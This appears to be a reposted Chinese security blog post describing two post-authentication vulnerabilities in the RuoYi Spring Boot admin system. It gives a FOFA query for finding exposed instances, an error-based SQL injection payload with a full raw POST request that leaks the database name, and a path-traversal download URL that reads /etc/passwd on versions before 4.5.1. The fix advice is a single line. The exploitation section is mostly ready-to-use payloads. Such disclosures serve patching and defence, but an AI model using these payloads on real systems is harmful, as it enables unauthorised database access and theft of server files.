若依(Ruoyi)管理系統後臺sql注入+任意檔案下載漏洞
阿新 • • 發佈:2021-08-03
0x00若依介紹
若依可以用於所有的Web應用程式,如網站管理後臺,網站會員中心,CMS,CRM,OA。所有前端後臺程式碼封裝過後十分精簡易上手,出錯概率低。同時支援移動客戶端訪問。系統會陸續更新一些實用功能。
寓意:你若不離不棄,我必生死相依
0x01漏洞描述
若依管理系統是基於SpringBoot的許可權管理系統,後臺存在sql注入、任意檔案下載漏洞,可以讀取資料庫、伺服器上的任意檔案內容。
0x02FOFA
app=”若依-管理系統”
0x03漏洞復現
SQL注入
這是個後臺洞,所以需要進入到後臺嚶嚶嚶
漏洞位置在”系統管理”裡中的”角色管理中”
http://xxxxxxx/system/role/list
POC:
pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=¶ms[beginTime]=¶ms[endTime]=¶ms[dataScope]=and
extractvalue(1,concat(0x7e,substring((select database()),1,32),0x7e))
POST /system/role/list HTTP/1.1 Host: xxx.xxx.xxx.xxx User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Cookie: JSESSIONID=dea10cdb-9d3c-4f6a-854a-ea1ca540a992 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 195 pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=¶ms[beginTime]=¶ms[endTime]=¶ms[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))
成功利用報錯注入拿到資料資料庫名稱
任意檔案下載
影響版本:RuoYi < v4.5.1
登入後臺後直接訪問以下url即可下載檔案
http://xxx/common/download/resource?resource/profile/../../../../etc/passwd
0x04漏洞修復
更新升級到最新版本